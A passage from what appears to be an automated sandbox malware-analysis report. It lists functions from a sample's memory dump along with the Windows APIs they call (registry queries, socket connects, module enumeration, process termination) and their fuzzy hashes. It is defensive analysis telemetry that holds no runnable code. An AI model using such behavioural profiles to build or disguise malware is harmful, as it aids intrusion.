Opcode Fuzzy Hash: 4f3783d3ae40e5703e2f671e358edbb4b1ac9a24d61cbb64945242941899ee9a
Instruction Fuzzy Hash: D0212675409380AFE7228B21CC45FA6BFB8EF06314F0984DBE9448F553D224A90DC771

Function 059318AE Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegNotifyChangeKeyValue.KERNEL32(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 05931958

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: ChangeNotifyValue
String ID:
API String ID: 3933585183-0
Opcode ID: c4c7783d2d683188b47dea9ae1211d2fc4aed2d0f2f503675b606e01d053226a
Instruction ID: ca24fa6a687b74914c1ead1d78da6c102ca701b3da11d3c6869799034a3df0d6
Opcode Fuzzy Hash: c4c7783d2d683188b47dea9ae1211d2fc4aed2d0f2f503675b606e01d053226a
Instruction Fuzzy Hash: 6031F571404384AFEB22CB51DC44FA6FFB8EF46314F08889AE9849B553D334A509C7B1

Function 059327AD Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 0593283E

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: fb3c15753ed02f1b46ae807ff49e7fe44193fee6ce8f9e4a868094b72819eaa8
Instruction ID: 19d06102ea3fecddd817671d09762e45922bec66bcc6a3111c7367b2960ab790
Opcode Fuzzy Hash: fb3c15753ed02f1b46ae807ff49e7fe44193fee6ce8f9e4a868094b72819eaa8
Instruction Fuzzy Hash: 1921E775505340AFE722CB51CC45FA6BFBCEF46210F08849AE945CB552D368E948CB71

Function 059328A4 Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

K32GetModuleBaseNameW.KERNEL32(?,00000E24,?,?), ref: 0593294A

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: BaseModuleName
String ID:
API String ID: 595626670-0
Opcode ID: 714c28d3165ba1a76ed523b0a76f2d5ed4c38d33ce1c81350bbe11cb671f37a3
Instruction ID: 56c7076e007596595ed33e9dec6ee7aabcad8f40d5b115e8b2514b31aa0bd0a4
Opcode Fuzzy Hash: 714c28d3165ba1a76ed523b0a76f2d5ed4c38d33ce1c81350bbe11cb671f37a3
Instruction Fuzzy Hash: DB21EF715093C06FD312CB65CC55B66BFB8EF87214F0984CBD884DB6A3C624A909C7B2

Function 059326C1 Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 0593274E

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 51969f51c38bd93b5419f97a2edc2f70498ed02806f649c3d0f8bcd15c81a9af
Instruction ID: 965efb817790306c65ecdb330c7638834b4383c52725e8acab4393a68c484010
Opcode Fuzzy Hash: 51969f51c38bd93b5419f97a2edc2f70498ed02806f649c3d0f8bcd15c81a9af
Instruction Fuzzy Hash: 5B21F7755093806FEB12CB25CC45FA6BFB8EF46310F0884DBE985DB553C264A948C771

Function 05930E64 Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

shutdown.WS2_32(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 05930EF8

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: shutdown
String ID:
API String ID: 2510479042-0
Opcode ID: 5acc780321a859772a5863844dd494e0e0a7e691dc6b87b223ffa40dc2106c4c
Instruction ID: ac3918264504b675f423079a427c50a43631c5f3111878c8390b748c17c7284b
Opcode Fuzzy Hash: 5acc780321a859772a5863844dd494e0e0a7e691dc6b87b223ffa40dc2106c4c
Instruction Fuzzy Hash: 262106B5504340AFE7128F11DC45FA6BFA8FF46324F1884DAE9448F593D2749949CBB1

Function 00CBBE78 Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 00CBBF0D

Memory Dump Source

Source File: 00000004.00000002.3074534296.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cba000_bbb.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 5eefa641bba3b419eae05db6aefb62638ede40bcaa463948ac1fd48ca65e92ea
Instruction ID: c02f989928c75db55ad90312bd73eaf683ed33f42124bdcbc4a1af72a0b46491
Opcode Fuzzy Hash: 5eefa641bba3b419eae05db6aefb62638ede40bcaa463948ac1fd48ca65e92ea
Instruction Fuzzy Hash: B621F8754097806FD7128B259C45BA6BFACEF47724F0880DAE9808B693D2649D09CB75

Function 05931156 Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,00000E24), ref: 059311D3

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: c5be688c8f68149869ba30fc6dc97ddc3966938cc54519588d8812c0dc34b73a
Instruction ID: 4328bd3541fe0fc7327d34fda30e854490d89833fec13e84b3b5efc3403a3874
Opcode Fuzzy Hash: c5be688c8f68149869ba30fc6dc97ddc3966938cc54519588d8812c0dc34b73a
Instruction Fuzzy Hash: 0521C472500204AFEB21DF95DD45FAABBECEF08314F04885AE945CBA51D334E549CBB1

Function 05930257 Relevance: 1.6, APIs: 1, Instructions: 80registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E24,?,?), ref: 059302FA

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 12365c11531fee0733ab3074d76cdb1b8f30a7edaec1677b601e9102645045b8
Instruction ID: 05ef00c08b124b8a399cfea3fb18f453f419689f4b5ff0613c615492e2cbf27b
Opcode Fuzzy Hash: 12365c11531fee0733ab3074d76cdb1b8f30a7edaec1677b601e9102645045b8
Instruction Fuzzy Hash: 5621D67550E3C06FD3138B25CC51B62BFB4EF87614F0A80CBE8849B693D225A959C7B2

Function 059309D6 Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 05930A61

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 73bc4678dc905bd04d81e1a999b88db3a420243c30304ea3592fef7812afe84f
Instruction ID: 6c28af1cf2a3b2d68dc1f2472537debc501c363c6b87e6cd8880cb6b9a4a9d88
Opcode Fuzzy Hash: 73bc4678dc905bd04d81e1a999b88db3a420243c30304ea3592fef7812afe84f
Instruction Fuzzy Hash: DF21B1B1509380AFE711CB65DC49F66FFE8EF05210F08849EE9858B642D375E908C772

Function 05933C1F Relevance: 1.6, APIs: 1, Instructions: 78encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 05933CA6

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: 19c11f2624350bdbbd6b6fdee186c7a306490d950ad67a1d41d1b9a689fb05d8
Instruction ID: 0124d564735318f7fd22ffab7e6bf01fb7ea0af0162853ef4155daba44d0ba39
Opcode Fuzzy Hash: 19c11f2624350bdbbd6b6fdee186c7a306490d950ad67a1d41d1b9a689fb05d8
Instruction Fuzzy Hash: B321C475505380AFE721CB65DC45FA6BFB8EF46310F08849AED858B552C375A848CB71

Function 05934C08 Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.KERNEL32(?,00000E24,?,?), ref: 05934CAE

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: 23bb846e6d58bcd1e533065129441fa64d727e51628b4c3ebf275ea0d7e7c7a2
Instruction ID: 36a9e800d5cda064080a1dda16d513ea9d3eca795ccfda771b75dfb6b94ae72e
Opcode Fuzzy Hash: 23bb846e6d58bcd1e533065129441fa64d727e51628b4c3ebf275ea0d7e7c7a2
Instruction Fuzzy Hash: A321606550E3C06FC3138B358C55A15BFB4EF87614F1D80CFD8849B6A3D225A959C7A2

Function 05932F34 Relevance: 1.6, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

TerminateProcess.KERNEL32(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 05932FB8

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: dc4f74f6529572cf8dac69ee0e3909da421f90749cb9848a6ee42160e3cd7e72
Instruction ID: 1fd0e0f747721dc4d664c4b098743d187f6a0a06dc641a22975aca193a7e5c0b
Opcode Fuzzy Hash: dc4f74f6529572cf8dac69ee0e3909da421f90749cb9848a6ee42160e3cd7e72
Instruction Fuzzy Hash: 6C21F5755093806FE7128B25DC45FA6BFBCEF46220F0884DBE984CF692C268A948C761

Function 00CBBDA2 Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 00CBBE21

Memory Dump Source

Source File: 00000004.00000002.3074534296.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cba000_bbb.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9614dcdc9202ae51afb2e57a756667eb00b8038b4309dd1aef47e47aa9bad978
Instruction ID: 2afc9bfd4ff7f73f9ec126ca11d32cb6429ad51be877f4a76154cb396d40cade
Opcode Fuzzy Hash: 9614dcdc9202ae51afb2e57a756667eb00b8038b4309dd1aef47e47aa9bad978
Instruction Fuzzy Hash: 4221B271500240AFEB20CF66CD85BA6FBE8EF08314F14846DE9458B652D375E908CB71

Function 00CBB420 Relevance: 1.6, APIs: 1, Instructions: 76libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,00000E24), ref: 00CBB4BB

Memory Dump Source

Source File: 00000004.00000002.3074534296.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cba000_bbb.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f7b1a148a5a9ba8c5eae56259eaa2556ab7bfdf0efbe6be2c1b5e2cdad619cd7
Instruction ID: 38d2c57de9359e8c7690ae69812498f3b40537061133ae3bfdc50988ae353f32
Opcode Fuzzy Hash: f7b1a148a5a9ba8c5eae56259eaa2556ab7bfdf0efbe6be2c1b5e2cdad619cd7
Instruction Fuzzy Hash: 4021F8710053806FE7228B11CC45BA6BFB8EF06324F0880DAF9445B193C368AD49CB71

Function 059343EB Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

GetExitCodeProcess.KERNEL32(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 05934470

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: CodeExitProcess
String ID:
API String ID: 3861947596-0
Opcode ID: 06ddc04eeaa7d29b69943ea76dfc66f491c35b19ff5a8d7c8b811db01c2123fc
Instruction ID: 9199aeb51152c41e0d3b08563bc2a8e23e8bbbc00242635cc2264fc9eb8a0eef
Opcode Fuzzy Hash: 06ddc04eeaa7d29b69943ea76dfc66f491c35b19ff5a8d7c8b811db01c2123fc
Instruction Fuzzy Hash: 6721F8715053406FD711CB55DC48FA6FFE8EF45310F0884AAE944CB552D378A948CB61

Function 05930846 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E24), ref: 059308B7

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 0c94bd3b50620e34f738448586793a9c197d40d88c892aecb742b9d0d9ff6fcc
Instruction ID: 578a3b583ae8bf89495c64df918b9c997d3e5a91ba6bb1775b1127456c541b33
Opcode Fuzzy Hash: 0c94bd3b50620e34f738448586793a9c197d40d88c892aecb742b9d0d9ff6fcc
Instruction Fuzzy Hash: E7219272600204AFEB20DF65DD45FABBBECEF04624F08845AE945DB641D374E5488BB1

Function 059365CA Relevance: 1.6, APIs: 1, Instructions: 75networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 05936653

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: a51430a4bbade2046e66ebe81482b5aa221a66d2c60b081c4e5e9585a1a865d5
Instruction ID: 70bb40553f00b4a28ae143e38c194793a743739c9a8acb2db491c554dd3a47c0
Opcode Fuzzy Hash: a51430a4bbade2046e66ebe81482b5aa221a66d2c60b081c4e5e9585a1a865d5
Instruction Fuzzy Hash: 7221B3754093846FD722CB61CC45FA6BFB8EF46314F08849AE9448F553D334A908CB71

Function 05930503 Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,?,?,?,?), ref: 05930580

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: f9e325597ce7019e88f737b4ab1740aaf1f4189d3146aeecf85a94231be66cc4
Instruction ID: 6e057b69d82d42613b34bae07cf8ff3d7a90a503e2ed222c2b121c44e3564178
Opcode Fuzzy Hash: f9e325597ce7019e88f737b4ab1740aaf1f4189d3146aeecf85a94231be66cc4
Instruction Fuzzy Hash: D021D1714093C09FCB128F659D94AA6BFB4EF07320F0D85CAE9848F163C225A948CB62

Function 0593151A Relevance: 1.6, APIs: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 0593159E

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: 096903a1976e4ec013773176668d975fac2dea4422f9b5567337c56d45e99c23
Instruction ID: e75f7d53b68efce3a4fc8304ee29bc4fceb89343653367d9d410ba1c12401689
Opcode Fuzzy Hash: 096903a1976e4ec013773176668d975fac2dea4422f9b5567337c56d45e99c23
Instruction Fuzzy Hash: 3E21CFB6404384AFD722CB51CC84FA7FBACEF45220F08849BE945DB652D234E548CBB5

Function 05933EA0 Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

select.WS2_32(?,?,?,?,?), ref: 05933F24

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: select
String ID:
API String ID: 1274211008-0
Opcode ID: c4d83b3b58b1386971a9bfcc751b3cfa5168765e9149f9b9683578211ef6b60d
Instruction ID: 95b8c02e3c8a3e29bc192e3d86b89c06358161e330574be5bb94bd0a72fb1f02
Opcode Fuzzy Hash: c4d83b3b58b1386971a9bfcc751b3cfa5168765e9149f9b9683578211ef6b60d
Instruction Fuzzy Hash: 9A218E715483849FE721CF15D844B62FFF8EF46210F08889AE989CB662D374E848CB61

Function 0593222A Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 059322B9

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: 66644d633c3fffe519d0ad88ef1cea599d47f1fe18bf35ffb402c3cabd20b0f2
Instruction ID: 41c31eaee737c5e087d6f990a8aa798bb6ab38a01b10690cc6cc495836668cc6
Opcode Fuzzy Hash: 66644d633c3fffe519d0ad88ef1cea599d47f1fe18bf35ffb402c3cabd20b0f2
Instruction Fuzzy Hash: 1D21B375409380AFD7228B51DC45FA6FFB8EF46310F0884CBE9848B5A3D365A908CB76

Function 05930D9A Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?), ref: 05930E0D

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 9dd2a8826e6e0a67ed86f39d0ab0279c70d5e08422a77535e5d4886086bc94e2
Instruction ID: 68acc95e5023fadcc9eef8803a45f5584f6e6a594477dcfdcc69f6d663f64162
Opcode Fuzzy Hash: 9dd2a8826e6e0a67ed86f39d0ab0279c70d5e08422a77535e5d4886086bc94e2
Instruction Fuzzy Hash: AC2180716042009FE720DB66DD49BA6FBE8EF04624F088869E9498B642D375E549CB71

Function 05933D06 Relevance: 1.6, APIs: 1, Instructions: 72encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 05933D8E

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: ff49e33128c8951efd5f101ecd8abc650a7bed15bbdca90e8d76551b9a0777db
Instruction ID: 50d29cdd420f04af2f3591dcc874ad4e486dc4bdd1a35109abb92f788be67d50
Opcode Fuzzy Hash: ff49e33128c8951efd5f101ecd8abc650a7bed15bbdca90e8d76551b9a0777db
Instruction Fuzzy Hash: 7E21CF75508380AFE722CB55DC44FA6FFB8EF46314F08889AE9849B653C379A548CB71

Function 0593135A Relevance: 1.6, APIs: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 059313D5

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: 052ff2719be239ade3b7d7523a124d6d27855938562ac120183162a713697df6
Instruction ID: 3ae8e145c24a754464e3e1c3834f7d5c9e08e595aa3ef680cc02850460e01ab5
Opcode Fuzzy Hash: 052ff2719be239ade3b7d7523a124d6d27855938562ac120183162a713697df6
Instruction Fuzzy Hash: 71216A75500600AFEB21CF55CC85FA6BBECEF08710F08896AED458BA62D334E548DBB1

Function 059315E8 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

RasConnectionNotificationW.RASAPI32(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 05931677

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: ConnectionNotification
String ID:
API String ID: 1402429939-0
Opcode ID: bb2ebe77c912bd85c611991471fa4929f264ee29bf8394f1acc7c4cf9dbdbca4
Instruction ID: e612fb6fda8dbd64959a7f54b841f33a8434d9e036a12350dc51ac04eb997593
Opcode Fuzzy Hash: bb2ebe77c912bd85c611991471fa4929f264ee29bf8394f1acc7c4cf9dbdbca4
Instruction Fuzzy Hash: B921C2B54093846FD7228B11DC45FA6BFB8EF46314F0C84DAE9848B563D264A908CBB6

Function 05936504 Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,4D31662F,00000000,?,?,?,?,?,?,?,?,6C9F3C58), ref: 0593658C

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: c56225b5b59e103cf500412ce816138499ec15af1555690f0675a7b37c674bbf
Instruction ID: bc5d906aafe93537b47af25de1ecd260972edaed732d1d993e89566463eb3968
Opcode Fuzzy Hash: c56225b5b59e103cf500412ce816138499ec15af1555690f0675a7b37c674bbf
Instruction Fuzzy Hash: F7218C7540D3C09FDB138B64C855655BFB4EF47210F0D84DBD8848F163D2699809C772

Function 059300E2 Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 05930161

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 9f072c34cde15c043011e07abb221a4e6972e6c43373afc52ede559053d56fd5
Instruction ID: f28b4b07847bfa4ef52344752fb7c9952db803181c2694d87de65679022f9fb0
Opcode Fuzzy Hash: 9f072c34cde15c043011e07abb221a4e6972e6c43373afc52ede559053d56fd5
Instruction Fuzzy Hash: 9021A175405380AFDB22CF51DD48FA7BFB8EF45310F08849AE9859B552C334A508CBB6

Function 00CBB70E Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 00CBB788

Memory Dump Source

Source File: 00000004.00000002.3074534296.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cba000_bbb.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: e651998acbbd66453f25fa7f750864bf97621a14979aa44366d33226d5ef3479
Instruction ID: 64b2feeb27ebb3b0a90c4e99f1f9c24f8eaf3033ffe6bd1aedc1ad1fc70ea42a
Opcode Fuzzy Hash: e651998acbbd66453f25fa7f750864bf97621a14979aa44366d33226d5ef3479
Instruction Fuzzy Hash: E7219D75600204AFE720CF56CD84FA6B7ECEF58714F08845AE945DB652DBA0ED48CBB1

Function 059322F6 Relevance: 1.6, APIs: 1, Instructions: 69networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 0593237A

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: 83648e8ed56b8ce83158770666e17be450bd914d1d21fdbcf15cd746a88b3a0b
Instruction ID: b8201c4aa534d1b688d2b19f7b775c348fad572a02a4a67b5f9edc74f88c6e38
Opcode Fuzzy Hash: 83648e8ed56b8ce83158770666e17be450bd914d1d21fdbcf15cd746a88b3a0b
Instruction Fuzzy Hash: 842190754093809FDB228F65C885A92FFF4FF4A210F0984DEE9858B563D275A809DB61

Function 05934E06 Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 05934E78

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: af6ebe6bb0b80fd730510aebce25a447e5a2264d260e13470d2ff6fffe9e738f
Instruction ID: f5e413aa2000ef23c24301d0d6eaf607e5e6a821faadab52e8387ddf9fc10b34
Opcode Fuzzy Hash: af6ebe6bb0b80fd730510aebce25a447e5a2264d260e13470d2ff6fffe9e738f
Instruction Fuzzy Hash: A0218E76604200AFEB31CF55CC49FA6BBECEF04610F08885AE9498B652D374E548CAB1

Function 059309F6 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 05930A61

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 71c7715e8441afe3af75a2b850f52e7cc57a7beace6338d5ee274aba7fb213bc
Instruction ID: 98844f2077fd44552562e4209d9c2b79bf2f72282fd03babce430ad4845d3b68
Opcode Fuzzy Hash: 71c7715e8441afe3af75a2b850f52e7cc57a7beace6338d5ee274aba7fb213bc
Instruction Fuzzy Hash: 0E21A1B15052009FE720CB65DD4AB66FBE8EF04324F04885AED458B742D375E909CA72

Function 059327DA Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 0593283E

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: 30898e0296644f726f49e75de0b69b9bf0e527a5589d8eea0630db5a60b6e8a4
